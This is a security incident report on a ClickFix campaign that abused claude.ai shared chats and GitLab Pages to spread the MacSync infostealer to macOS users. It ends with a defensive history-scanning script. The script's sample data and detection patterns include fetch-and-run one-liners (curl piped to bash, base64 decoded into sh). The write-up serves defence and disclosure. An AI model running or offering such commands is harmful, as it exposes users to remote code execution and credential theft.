At a Glance
| Platform abused | claude.ai shared chat feature (Anthropic) and GitLab Pages |
|---|---|
| Data exposed | Browser credentials, cookies, SSH keys, and crypto wallet files (stolen by MacSync) |
| Victims affected | Over 2,000 victims funneled to lure pages; Asia-Pacific hit hardest (TrendAI figures) |
| Cause | Google Ads malvertising plus ClickFix social engineering |
| Disclosure status | Reported by TrendAI; Anthropic banned accounts and disabled chats |
| Source | Trend Micro (TrendAI Research) |
TL;DR
A ClickFix malvertising campaign abused claude.ai’s shared chat feature to deliver Mac malware. The attackers ran Google Ads for fake AI tools, then hosted lure pages on a trusted domain. The payload was the MacSync infostealer, which steals credentials and wallet files. The abuse ran for weeks before Anthropic shut it down.
What Was Exposed
Anthropic itself was not breached; the attackers abused a legitimate feature to host their lures. ClickFix works by talking the victim into pasting and running a terminal command by hand, so the attacker never has to push a file past browser download warnings. The real harm fell on infected victims. On each infected Mac, the MacSync infostealer harvested browser credentials and cookies, SSH keys, and cryptocurrency wallet files, then sent that data to a second-stage server. The stolen data can unlock accounts, code repositories, and crypto holdings. Stolen session cookies are the most immediately useful of these, because they let the attacker ride an existing login without the password or a second factor.
How It Happened

The operators bought Google search ads for popular AI developer tools. Trend Micro found lures for Claude, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains. These ads funneled over 2,000 victims toward malicious pages. The operators tested many AI brands to find the best-performing lure. Claude products drew the most clicks by far. Early waves used fake download pages on GitLab Pages. The actor rotated 92 hostnames on the trusted *.gitlab.io domain. Trend Micro counted 106 malicious hostnames across six waves in seven weeks.
The campaign then pivoted. In May, the operators moved their lures onto claude.ai’s shared chat feature. They created weaponized “shared chats” that posed as Apple Support. Each chat told the user to open Terminal and paste a command. That command then pulled and ran the infostealer in the background. Trend Micro observed at least 45 weaponized share links in that single shift.
Why the Claude.ai Shared Chat Trick Worked
The pivot defeated the standard advice to check the address bar and the certificate. Trend Micro notes that “every traditional defensive signal collapses” here. Victims landed on the real claude.ai domain with a valid certificate, so browser warnings, URL reputation checks, and domain allowlists all saw nothing wrong. The share page is a genuine Claude conversation; the only malicious part is the text the attacker typed into it. This makes the attack harder to spot than a fake lookalike site. The report adds that the move turned “the trusted domain into a delivery mechanism for credential-stealing malware.”
Who Is Affected
The campaign mainly hit macOS users who searched for AI tools. Asia-Pacific absorbed about 67% of confirmed traffic. Taiwan alone made up 30.5%, with 772 interactions. Japan and Singapore followed. Later waves broadened the targeting toward Singapore, India, France, and Italy. Notably, the loader skipped systems with a Russian keyboard layout. That choice points to a suspected Russian-speaking operator.
These figures come from TrendAI’s own traffic tracking. They are not the result of a third-party audit.
What Affected People Should Do
Anyone who pasted a terminal command from one of these pages should act now. If you are not sure whether you did, check your shell history for a command you did not type yourself, such as a curl piped into sh or a base64-decoded one-liner. Treat saved browser passwords, SSH keys, and wallet seeds as exposed. From a clean device, reset those credentials and sign out of all active sessions, since stolen cookies stay valid until the session is revoked. Move any crypto funds to fresh wallets. Watch your accounts and crypto wallets for unusual activity over the coming weeks. Going forward, install apps only from official sites or package managers like Homebrew, and distrust software ads in search results.
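A quick way to make the history check above concrete is to grep the shell history for ClickFix-style one-liners. The script below is an added example, not code from the Trend Micro report, and the indicator patterns are generic assumptions about how these lures typically look (curl piped into a shell, base64 decoding, quarantine-attribute stripping, osascript); the campaign's actual command is not reproduced here. The sample history file is constructed inline so the script runs offline.

```shell
#!/bin/sh
# Added example: scan a shell history file for ClickFix-style one-liners.
# The patterns are generic assumptions, not the campaign's real command.

# scan_history FILE
#   Prints every history entry that matches an indicator pattern.
#   Exit status is 0 if at least one line matched, 1 otherwise (grep's own).
scan_history() {
  # zsh extended history stores ": <epoch>:<elapsed>;<command>"; strip that
  # prefix so the patterns see only the command. bash history lines have no
  # prefix and pass through sed unchanged.
  sed 's/^: [0-9]*:[0-9]*;//' "$1" | grep -E -i \
    -e 'curl[^|]*[|][[:space:]]*(ba|z)?sh' \
    -e 'base64[[:space:]]+(-d|-D|--decode)' \
    -e 'xattr[[:space:]]+-[rd]+[[:space:]]+com\.apple\.quarantine' \
    -e 'osascript[[:space:]]+-e'
}

# count_hits FILE
#   Number of matching history entries, as a bare integer.
count_hits() {
  scan_history "$1" | wc -l | tr -d ' '
}

# make_sample_history
#   Writes a constructed zsh-style history file to a temp path and prints
#   the path. Two of the five entries are ClickFix-style (assumed shapes).
make_sample_history() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
: 1715000000:0;ls -la
: 1715000001:0;brew install jq
: 1715000002:0;curl -fsSL https://example.invalid/install.sh | bash
: 1715000003:0;echo aGVsbG8= | base64 -d | sh
: 1715000004:0;git status
EOF
  printf '%s\n' "$f"
}

# Stand-alone demo: scan the constructed file. On a real Mac you would run
# scan_history "$HOME/.zsh_history" (zsh is the default shell on macOS).
demo_file=$(make_sample_history)
scan_history "$demo_file" || echo "no ClickFix-style commands found"
```

A match is not proof of infection (developers do pipe installers into bash on purpose), but a command you do not remember typing, especially one that decodes base64 or removes the quarantine attribute, is the trigger to treat the machine as compromised.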
Company Response
Anthropic acted after TrendAI reported the abuse. The company banned the accounts behind the scheme. It also disabled the malicious shared conversations. Anthropic says it is adding more abuse mitigations for the shared chat feature. The case shows that even trusted platforms need strong abuse controls.